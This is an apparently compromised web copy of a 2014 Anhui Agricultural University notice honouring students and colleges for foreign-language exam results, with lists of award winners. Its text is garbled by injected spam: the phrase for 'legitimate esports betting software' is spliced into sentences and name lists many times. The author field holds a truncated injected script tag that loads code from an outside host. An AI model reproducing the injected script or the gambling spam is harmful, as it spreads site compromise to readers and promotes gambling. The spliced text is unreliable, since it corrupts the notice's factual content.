• 光榮榜

    關于表彰外語學習優秀個人和先進集體的公示

    作者:  文章來源:<script src="http://www.knsopen.com/http://114.213.14 更新日期:2014-06-17

    關于表彰外語學習優秀個人和先進集體的公示

     

    各學院,校直有關單位:

        為激勵大學生學習外語的熱情,經研究決定正规的电竞竞猜软件,對2013年度非英語專業參加大學英語四級考試成績達570分以上(含570分)的32位同學、2013年度非英語專業參加大學英語六級考試成績達550分以上(含550分)的7位同學、2013年度英語專業參加英語專業四級考試成績達80分以上(含80分)的8位同學、2013年度英語專業參加英語專業八級考試成績達80分以上(含80分)的1位同學正规的电竞竞猜软件正规的电竞竞猜软件、2013年度法語專業參加法語專業四級考試成績達80分以上(含80分)的1位同學、2013年度法語專業參加法語專業八級考試成績達80分以上(含80分)的2位同學、2013年度日語專業參加日語專業四級考試成績達88分以上(含88分)的8位同學、2013年全國大學生英語競賽B、C類考生獲一等獎以上的8位同學予以通報表彰;對2013屆大學英語四級累計通過率排名前6名的學院予以通報表彰?,F將表彰結果公示如下,如有異議,請在6月16日-6月19日向教務處及紀委反映,聯系電話:65786189正规的电竞竞猜软件、65186116。

     

        附件:安徽農業大學外語學習優秀個人和優秀集體名單

     

    安徽農業大學

    2014616

     

     

     

     

     

     

     

     

     

     

     

     

    附件

    安徽農業大學外語學習優秀個人和優秀集體名單

     

    安徽農業大學2013年度大學英語四級考試成績優秀學生名單(32人)

    茶與食品科技學院 (2人)

    吳芷萌正规的电竞竞猜软件、何夢晶

    動物科技學院 (3人)

    黃自強、劉翠霞、儲小慧

    經濟管理學院 (7人)

    成浩、徐童、管曉霞、周芳正规的电竞竞猜软件、鄭睿、黃河雪舟、張羽蒙

    理學院 (1人)

    胡銳

    林學與園林學院 (1人)

    鄧雅云

    農學院 (2人)

    高雨萌、晁盛茜

    輕紡工程與藝術學院(1人)

    丁乾琨

    人文社會科學學院 (5人)

    林雨薇、許珂、王澄鋼、董清源、許雅康

    生命科學學院 (1人)

    胡學浩

    外國語學院 (4人)

    劉璐、汪英、張同同、史若男

     

    園藝學院(3人)

    余永芳正规的电竞竞猜软件、侯新星、姚榕

    植物保護學院(1人)

    林栩敏

    資源與環境學院(1人)

    吳欣欣

    安徽農業大學2013年度大學英語六級考試成績優秀學生名單(7人)

    經濟管理學院 (1人)

    張揚

    林學與園林學院(1人)

    閆筱筱

    人文社會科學學院 (3人)

    丁詠澤、秦可為、葉舒陽

    生命科學學院(1人)

    成琳

    園藝學院(1人)

    肖琪

    安徽農業大學2013屆本科生大學英語四級考試累計通過率優秀集體獲獎名單

    經濟管理學院 

    人文社會科學學院

    茶與食品科技學院

    生命科學學院 

    植保學院

    林學與園林學院

    安徽農業大學2013年度日語專業四級優秀名單

    外國語學院 (8人)

    潘靜雯、胡群、李佳、李敏君、范玲君、程璐璐正规的电竞竞猜软件、劉先花正规的电竞竞猜软件、張慧鳳

    安徽農業大學2013年度法語專業四級優秀名單

    外國語學院 (1人)

    馮超

    安徽農業大學2013年度英語專業四級優秀名單

    外國語學院 (8人)

    范曉青、方敏、季玲玲、鐘迪、汪中瑞、王楠、張亮、王敏

    安徽農業大學2013年度英語專業八級優秀名單

    外國語學院 (1人)

    劉芬

    安徽農業大學2013年度法語專業八級優秀名單

    外國語學院 (2人)

    李潔瓊正规的电竞竞猜软件、鮑志娟

    2014年全國大學生英語競賽C類考生獲一等獎以上獎名單

    人文社會科學學院(2人)

    葉舒陽正规的电竞竞猜软件、張傳梅

    經濟管理學院(4人)

    成浩、黃佳、王曉冉、陳興

    理學院(1人)

    艾承穎

    2014年全國大學生英語競賽B類考生獲一等獎以上獎名單

    外國語學院(1人)

    許璐婷

    安徽農業大學2013年度公共英語教學優秀教師名單

    朱蓓蓓

    許宗瑞




    正规的电竞竞猜软件